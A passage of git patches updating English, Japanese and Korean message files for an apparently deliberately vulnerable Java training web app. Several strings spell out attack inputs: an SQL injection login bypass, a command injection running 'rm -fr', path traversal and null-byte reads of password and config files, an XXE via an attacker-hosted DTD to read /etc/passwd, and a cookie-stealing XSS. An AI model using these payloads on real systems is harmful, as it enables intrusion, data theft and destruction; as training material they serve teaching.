in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=Please click on one of the links below. -description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch file (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError, StackOverflowError, NoClassDefFoundError, and so on\: -description.parse.json=If you enter a JSON string, then a result checked by JSON.parse() of JavaScript is shown. +description.parse.json=When you enter a JSON string, a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=Issues for performance description.random.string.generator=When you enter a character count, a random characters of the count is created. -description.response.time=If you add pingurl\=[a URL] to query string, the response code and time from the url is shown. +description.response.time=When you add pingurl\=[a URL] to query string, the response code and time from the url is shown. description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=Exceptions, extending from java.lang.RuntimeException\: description.send.mail=You can send a mail to the site administrator. @@ -21,7 +21,7 @@ function.description.brute.force=This login page is vulnerable for brute-force a function.description.clickjacking=There is a clickjacking vulnerability in the change mail address page. function.description.code.injection=There is a code injection vulnerability in this page. function.description.csrf=There is a CSRF vulnerability in the change password page. -function.description.dangerous.file.inclusion=An external dangerous file is included in this page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=Database connection leak occurs every time you load the page. function.description.dead.lock=Deadlock (Java) can occur. function.description.dead.lock2=Deadlock (SQL) can occur. @@ -47,9 +47,9 @@ function.description.path.traversal=There is a path traversal vulnerability in t function.description.redirect.loop=Redirect loop occurs if you click this link. function.description.round.off.error=Round off error can occur. function.description.session.fixation=This login page is vulnerable for session fixation attack. -function.description.slow.regular.expression=It takes time to parse the regular expression if you enter a specific string. -function.description.slow.string.plus.operation=It takes time to append strings if you enter a large number. -function.description.slow.unnecessary.object.creation=If you input a large number, it takes time to respond due to unnecessary object creation. +function.description.slow.regular.expression=It takes time to parse a regular expression. +function.description.slow.string.plus.operation=It takes time to append strings. +function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.throwable={0} is thrown if you click this link. @@ -167,7 +167,7 @@ label.your.mail=Your Mail Address label.your.name=Your Name msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. -msg.add.users.by.xml=If you upload an XML file of the following format, users can be registered all at once. +msg.add.users.by.xml=When you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=Well come to admins page\!\! msg.answer.is.correct=Your answer is correct\! msg.authentication.fail=Authentication failed. Please login again. @@ -190,8 +190,8 @@ msg.enter.json.string=Please enter JSON string. msg.enter.mail=Please enter your mail address. msg.enter.math.expression=Please enter a mathematical expression. You can use java.lang.Math in the expression. For example, Math.sqrt(Math.pow(2, 6)) - 5 msg.enter.name=Please enter your name. -msg.enter.name.and.passwd=If you enter your name and password, then your secret number is shown. -msg.enter.passwd=If you enter a new password and click the submit button, then your password will be changed. +msg.enter.name.and.passwd=When you enter your name and password, your secret number is shown. +msg.enter.passwd=When you enter a new password and click the submit button, your password will be changed. msg.enter.positive.number=Please enter a positive number. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. @@ -214,7 +214,7 @@ msg.note.clickjacking=This page receives a request that a user does not intend a msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. -msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. @@ -231,14 +231,14 @@ msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. -msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then the parse processing will take several tens of seconds.
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 -msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. @@ -247,7 +247,7 @@ msg.note.verbose.errror.message=You can login with admin and msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd -msg.note.xxe.step2=and upload the following XML file, you can display the password file (/etc/passwd) on the Linux server. +msg.note.xxe.step2=and upload the following XML file, then you can display the password file (/etc/passwd) on the Linux server. msg.passwd.change.failed=Password change failed. msg.passwd.changed=Your password is successfully changed. msg.passwd.is.too.short=The password must be at least 8 characters. @@ -262,7 +262,7 @@ msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. msg.update.users=You can update users information. -msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. +msg.update.users.by.xml=When you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=The user already exists. msg.user.not.exist=The user does not exist. msg.valid.json=Valid JSON\! From aa4c8d05cf136bd0c73bf1b587908233556fd534 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 13 Nov 2018 15:52:02 +0900 Subject: [PATCH 080/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 34 +++++++++++------------ 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 4e0ad65..dbcc6ad 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -1,15 +1,15 @@ #X-Generator: crowdin.com description.access.history=\u3053\u306e\u30da\u30fc\u30b8\u306e\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 (\u6700\u65b0\u306e15\u4ef6) -description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. description.design.test=\u4ee5\u4e0b\u306e\u3044\u305a\u308c\u304b\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3057\u3066\u4e0b\u3055\u3044\u3002 -description.endless.waiting=When you enter a character count, a batch (including echo characters of the count) is created and executed. +description.endless.waiting=When you enter a character count, a batch file (including echo characters of the count) is created and executed. description.errors=OutOfMemoryError\u3001StackOverflowError\u3001NoClassDefFoundError\u306a\u3069 -description.parse.json=JSON\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001JavaScript\u306eJSON.parse()\u3067\u691c\u8a3c\u3057\u305f\u7d50\u679c\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 +description.parse.json=When you enter a JSON string, a result checked by JSON.parse() of JavaScript is shown. description.performance.issue=\u6027\u80fd\u306b\u95a2\u3059\u308b\u554f\u984c description.random.string.generator=When you enter a character count, a random characters of the count is created. -description.response.time=\u30af\u30a8\u30ea\u6587\u5b57\u5217\u306bpingurl\=[\u4efb\u610fURL]\u3092\u8ffd\u52a0\u3059\u308b\u3068\u3001\u305d\u306eURL\u304b\u3089\u306e\u5fdc\u7b54\u30b3\u30fc\u30c9\u3068\u6642\u9593\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 +description.response.time=When you add pingurl\=[a URL] to query string, the response code and time from the url is shown. description.reverse.string=When you enter a string, the reversed string is shown. description.section.exceptions=java.lang.RuntimeException\u304b\u3089\u7d99\u627f\u3057\u305f\u4f8b\u5916 description.send.mail=\u30b5\u30a4\u30c8\u306e\u7ba1\u7406\u8005\u306b\u30e1\u30fc\u30eb\u3092\u9001\u4fe1\u3067\u304d\u307e\u3059\u3002 @@ -21,7 +21,7 @@ function.description.brute.force=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30f function.description.clickjacking=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306f\u30af\u30ea\u30c3\u30af\u30b8\u30e3\u30c3\u30ad\u30f3\u30b0\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.code.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.csrf=\u30d1\u30b9\u30ef\u30fc\u30c9\u5909\u66f4\u30da\u30fc\u30b8\u306b\u306fCSRF\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.description.dangerous.file.inclusion=An external dangerous file is included in this page. +function.description.dangerous.file.inclusion=An external dangerous file can be included in this page. function.description.database.connection.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 function.description.dead.lock=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af(Java)\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 function.description.dead.lock2=\u30c7\u30c3\u30c9\u30ed\u30c3\u30af(SQL)\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 @@ -47,9 +47,9 @@ function.description.path.traversal=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u function.description.redirect.loop=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u30eb\u30fc\u30d7\u304c\u767a\u751f\u3057\u307e\u3059\u3002 function.description.round.off.error=\u4e38\u3081\u8aa4\u5dee\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 function.description.session.fixation=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306b\u306f\u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 -function.description.slow.regular.expression=\u7279\u5b9a\u306e\u6587\u5b57\u5217\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6b63\u898f\u8868\u73fe\u306e\u89e3\u6790\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -function.description.slow.string.plus.operation=\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u9023\u7d50\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 -function.description.slow.unnecessary.object.creation=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u6642\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 +function.description.slow.regular.expression=It takes time to parse a regular expression. +function.description.slow.string.plus.operation=It takes time to append strings. +function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fSQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.thread.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 function.description.throwable=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001{0}\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 @@ -167,7 +167,7 @@ label.your.mail=\u3042\u306a\u305f\u306e\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30 label.your.name=\u3042\u306a\u305f\u306e\u540d\u524d msg.account.locked=Your account is locked out because the number of login failures exceeds {0} times. -msg.add.users.by.xml=\u6b21\u306e\u5f62\u5f0f\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u4e00\u62ec\u3067\u767b\u9332\u3067\u304d\u307e\u3059\u3002 +msg.add.users.by.xml=When you upload an XML file of the following format, users can be registered all at once. msg.admin.page.top=\u7ba1\u7406\u8005\u30da\u30fc\u30b8\u3078\u3088\u3046\u3053\u305d\uff01\uff01 msg.answer.is.correct=\u6b63\u89e3\u3067\u3059\u3002 msg.authentication.fail=\u8a8d\u8a3c\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002\u518d\u5ea6\u30ed\u30b0\u30a4\u30f3\u3057\u3066\u4e0b\u3055\u3044\u3002 @@ -190,8 +190,8 @@ msg.enter.json.string=JSON\u6587\u5b57\u5217\u3092\u5165\u529b\u3057\u3066\u4e0b msg.enter.mail=\u30e1\u30fc\u30eb\u30a2\u30c9\u30ec\u30b9\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.enter.math.expression=\u6570\u5f0f\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002\u6570\u5f0f\u306b\u306fjava.lang.Math\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u4f8b)Math.sqrt(Math.pow(2, 6)) - 5 msg.enter.name=\u540d\u524d\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.enter.name.and.passwd=\u540d\u524d\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6697\u8a3c\u756a\u53f7\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 -msg.enter.passwd=\u65b0\u3057\u3044\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u5909\u66f4\u3055\u308c\u307e\u3059\u3002 +msg.enter.name.and.passwd=When you enter your name and password, your secret number is shown. +msg.enter.passwd=When you enter a new password and click the submit button, your password will be changed. msg.enter.positive.number=\u6b63\u306e\u6574\u6570\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.enter.string=\u6587\u5b57\u5217\u3092\u5165\u529b\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.error.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u306a\u3044\u304b\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u4e00\u81f4\u3057\u307e\u305b\u3093\u3002 @@ -214,7 +214,7 @@ msg.note.clickjacking=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30 msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. If you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. msg.note.codeinjection={}');java.lang.System.exit(0);//\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b3\u30fc\u30c9\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u3067 JavaVM\u304c\u5f37\u5236\u7d42\u4e86\u3057\u307e\u3059\u3002 msg.note.commandinjection=@Runtime@getRuntime().exec('rm -fr /your-important-dir/')\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u91cd\u8981\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u304c\u524a\u9664\u3055\u308c\u307e\u3059\u3002 -msg.note.createobjects=\u5927\u304d\u306a\u6570\u5024\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308a\u3001\u5fdc\u7b54\u306b\u6642\u9593\u304c\u304b\u304b\u308a\u307e\u3059\u3002 +msg.note.createobjects=If you enter a large number, then it takes time to respond due to unnecessary object creation. msg.note.csrf=\u3053\u306e\u30da\u30fc\u30b8\u306f\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u610f\u56f3\u3057\u306a\u3044\u30ea\u30af\u30a8\u30b9\u30c8\u3082\u53d7\u4fe1\u3057\u3066\u3001\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u5909\u66f4\u3057\u3066\u3057\u307e\u3044\u307e\u3059\u3002 msg.note.dangerous.file.inclusion=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=[\u60aa\u610f\u306e\u3042\u308bJSP\u30d5\u30a1\u30a4\u30eb\u304c\u30c7\u30d7\u30ed\u30a4\u3055\u308c\u305fURL]\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u60aa\u610f\u306e\u3042\u308b\u30b3\u30fc\u30c9\u304c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002 msg.note.db.connection.leak.occur=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 @@ -231,14 +231,14 @@ msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this msg.note.mojibake=\u6587\u5b57\u5217\u306b\u65e5\u672c\u8a9e\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5316\u3051\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.netsocketleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.not.use.ext.db=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u306f\u3001MySQL\u306a\u3069\u306e\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306f\u3001application.properties\u3092\u7de8\u96c6\u3057\u3066\u4e0b\u3055\u3044\u3002 -msg.note.nullbyteinjection=\u30d0\u30fc\u30b8\u30e7\u30f31.7.0_40\u3088\u308a\u524d\u306eJava\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u5834\u5408\u3001\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u306bfileName\=../WEB-INF/web.xml%00\u3092\u4ed8\u52a0\u3059\u308b\u3068\u3001web.xml\u306e\u5185\u5bb9\u3092\u542b\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059\u3002 +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=../uid/adminpassword.txt?\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u3053\u306e\u30da\u30fc\u30b8\u306badminpassword.txt\u306e\u5185\u5bb9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 msg.note.roundofferror=1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e38\u3081\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.session.fixation=You can login with admin and password. The URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then the parse processing will take several tens of seconds.
 If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 -msg.note.strplusopr=+(\u30d7\u30e9\u30b9)\u6f14\u7b97\u5b50\u3067\u6587\u5b57\u5217\u3092\u9023\u7d50\u3057\u3066\u3044\u308b\u305f\u3081\u3001\u5927\u304d\u306a\u6587\u5b57\u6570\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6587\u5b57\u5217\u751f\u6210\u306b\u6570\u5341\u79d2\u304b\u308a\u307e\u3059\u3002 +msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.truncationerror=3\u30017\u30019\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6253\u3061\u5207\u308a\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. @@ -247,7 +247,7 @@ msg.note.verbose.errror.message=You can login with admin and msg.note.xee=\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u30ea\u30bd\u30fc\u30b9\u3092\u6d6a\u8cbb\u3057\u307e\u3059\u3002 msg.note.xss=\u540d\u524d\u306b>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30bb\u30c3\u30b7\u30e7\u30f3ID\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 msg.note.xxe.step1=\u3053\u306e\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308bWeb\u30b5\u30fc\u30d0\u30fc\u306b\u6b21\u306eDTD\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u4f8b) http\://attacker.site/vulnerable.dtd -msg.note.xxe.step2=\u6b21\u306b\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001Linux\u30b5\u30fc\u30d0\u30fc\u306e\u30d1\u30b9\u30ef\u30fc\u30c9\u30d5\u30a1\u30a4\u30eb(/etc/passwd)\u304c\u8868\u793a\u3067\u304d\u307e\u3059\u3002 +msg.note.xxe.step2=and upload the following XML file, then you can display the password file (/etc/passwd) on the Linux server. msg.passwd.change.failed=\u30d1\u30b9\u30ef\u30fc\u30c9\u306e\u5909\u66f4\u306b\u5931\u6557\u3057\u307e\u3057\u305f\u3002 msg.passwd.changed=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f\u6b63\u5e38\u306b\u5909\u66f4\u3055\u308c\u307e\u3057\u305f\u3002 msg.passwd.is.too.short=\u30d1\u30b9\u30ef\u30fc\u30c9\u306f8\u6841\u4ee5\u4e0a\u306b\u3057\u3066\u4e0b\u3055\u3044\u3002 @@ -262,7 +262,7 @@ msg.sent.mail=\u30e1\u30fc\u30eb\u304c\u6b63\u5e38\u306b\u9001\u4fe1\u3055\u308c msg.unknown.exception.occur=\u4f55\u3089\u304b\u306e\u4f8b\u5916\u304c\u767a\u751f\u3057\u307e\u3057\u305f \: {0} msg.update.records={0}\u4ef6\u66f4\u65b0\u3057\u307e\u3057\u305f\u3002 msg.update.users=\u30e6\u30fc\u30b6\u30fc\u60c5\u5831\u3092\u4e00\u62ec\u3067\u66f4\u65b0\u3057\u307e\u3059\u3002 -msg.update.users.by.xml=\u6b21\u306e\u5f62\u5f0f\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30e6\u30fc\u30b6\u30fc\u304c\u4e00\u62ec\u3067\u66f4\u65b0\u3067\u304d\u307e\u3059\u3002 +msg.update.users.by.xml=When you upload an XML file of the following format, users can be updated all at once. msg.user.already.exist=\u65e2\u306b\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u3059\u3002 msg.user.not.exist=\u30e6\u30fc\u30b6\u30fc\u304c\u5b58\u5728\u3057\u307e\u305b\u3093\u3002 msg.valid.json=\u6b63\u3057\u3044JSON\u6587\u5b57\u5217\u3067\u3059\u3002 From cdf02c145270d088bfe4f3123f3e8aae00785ca4 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Tue, 13 Nov 2018 15:52:05 +0900 Subject: [PATCH 081/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 34 +++++++++++------------ 1 file changed, 17 insertions(+), 17 deletions(-) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index f059658..60a7783 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -1,15 +1,15 @@ #X-Generator: crowdin.com description.access.history=Access history in this page (The latest 15 records). -description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable.The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. +description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For 